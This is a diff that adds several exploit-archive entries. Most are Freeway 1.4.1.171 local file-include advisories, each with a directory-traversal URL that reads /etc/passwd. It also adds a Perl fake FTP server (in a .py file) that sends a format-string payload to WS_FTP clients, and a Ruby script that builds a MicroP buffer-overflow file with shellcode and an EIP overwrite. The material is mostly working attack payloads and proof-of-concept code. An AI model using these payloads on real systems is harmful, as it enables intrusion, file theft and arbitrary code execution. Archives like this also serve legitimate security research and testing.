vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32260.txt b/platforms/php/webapps/32260.txt new file mode 100755 index 000000000..47f78c11c --- /dev/null +++ b/platforms/php/webapps/32260.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32264.txt b/platforms/php/webapps/32264.txt new file mode 100755 index 000000000..aa12b7b63 --- /dev/null +++ b/platforms/php/webapps/32264.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32265.txt b/platforms/php/webapps/32265.txt new file mode 100755 index 000000000..d7010e1e7 --- /dev/null +++ b/platforms/php/webapps/32265.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32266.txt b/platforms/php/webapps/32266.txt new file mode 100755 index 000000000..8f185aa3c --- /dev/null +++ b/platforms/php/webapps/32266.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32267.txt b/platforms/php/webapps/32267.txt new file mode 100755 index 000000000..13be38e5f --- /dev/null +++ b/platforms/php/webapps/32267.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32268.txt b/platforms/php/webapps/32268.txt new file mode 100755 index 000000000..a096cb05a --- /dev/null +++ b/platforms/php/webapps/32268.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32269.txt b/platforms/php/webapps/32269.txt new file mode 100755 index 000000000..8267cd4d3 --- /dev/null +++ b/platforms/php/webapps/32269.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32270.txt b/platforms/php/webapps/32270.txt new file mode 100755 index 000000000..3b14e1c29 --- /dev/null +++ b/platforms/php/webapps/32270.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. + +Freeway 1.4.1.171 is vulnerable; other versions may also be affected. + +http://www.example.com/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/windows/dos/32256.py b/platforms/windows/dos/32256.py new file mode 100755 index 000000000..241be25aa --- /dev/null +++ b/platforms/windows/dos/32256.py @@ -0,0 +1,47 @@ +source: http://www.securityfocus.com/bid/30720/info + +Ipswitch WS_FTP client is prone to a format-string vulnerability it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. + +An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition. + +This issue affects the WS_FTP Home and WS_FTP Professional clients. + +################################################################################################################## +# +# Ipswitch WS_FTP Home/WS_FTP Professional FTP Client Remote Format String vulnerability +# Vendor : http://www.ipswitch.com/ +# Affected Os : Windows * +# Risk : critical +# +# This bug is pretty interresting in the way you have to exploit it in a weird way... +# +# With this PoC you'll get a full control over EAX/ECX +# ( +# eax=41414141 ebx=0000000a ecx=41414141 edx=00000000 esi=41414142 edi=02b1f0ab +# eip=77d3ef68 esp=02b1f01c ebp=02b1f064 iopl=0 nv up ei pl nz na po nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +# USER32!CharLowerA+0x93: +# 77d3ef68 8a10 mov dl,[eax] ds:0023:41414141=?? +# ) +# Fake Server PoC : +use strict; +use Socket; + +my $port = shift || 21; +my $proto = getprotobyname('tcp'); +my $goodz = "\x41\x41\x41\x41\x41\x41\x41\x41%x%x%x%x%x%x%x%s"; + +my $visitor; +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) +or die "To bad $!\n"; +setsockopt(SOCKET, SOL_SOCKET, SO_REUSEADDR, 1); +bind(SOCKET, pack( "S n a4 x8", AF_INET, $port, "\0\0\0\0" )) +or die "Shitz port $port is allready in use, shut down your ftp server !\n"; +listen(SOCKET, 5) or die "Listen: $!"; +print "Fake Server started on port $port\n"; +while ($visitor = accept(NEW_SOCKET, SOCKET)) { +print NEW_SOCKET $goodz; +close NEW_SOCKET; +} + +# Anyways, in the WS_FTP Home client there's still a buffer overflow in the FTP server message response ( 4100 chars answer --> done ). diff --git a/platforms/windows/local/32261.rb b/platforms/windows/local/32261.rb new file mode 100755 index 000000000..11c75a25b --- /dev/null +++ b/platforms/windows/local/32261.rb @@ -0,0 +1,44 @@ +#!/usr/bin/env ruby +# Exploit Title:MicroP(.mppl) Local Stack Based Buffer Overflow +# Author:Necmettin COSKUN => twitter.com/babayarisi +# Blog : http://www.ncoskun.com http://www.grisapka.org +# Vendor :http://sourceforge.net/projects/microp/ +# Software link:http://sourceforge.net/projects/microp/files/latest/download +# version: 0.1.1.1600 +# Tested on: windows XP sp2 +# 4ewa2getha! ;) + +print "\n" + print "\n" + print " by\n" + print " _ _ _ v2 _ \n" + print " | |_ ___| |_ ___ _ _ ___ ___|_|___|_| \n" + print " | . | .'| . | .'| | | .'| _| |_ -| | \n" + print " |___|__,|___|__,|_ |__,|_| |_|___|_| \n" + print " |___| \n" + print " \n" + print "\n" + print "\n" + + +#shellcode = http://www.exploit-db.com/exploits/28996/ +#User32-free Messagebox Shellcode for any Windows version + + babacode = + "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+ + "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+ + "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+ + "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+ + "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+ + "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+ + "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+ + "\x49\x0b\x31\xc0\x51\x50\xff\xd7" +dolgu = "\x41" * 1163 +eip = [0x100145B5].pack('V') + +bumbala=babacode+dolgu+eip + +File.open('baba.mppl', 'w') do |bofdosya| +bofdosya.puts (bumbala) +bofdosya.close() +end \ No newline at end of file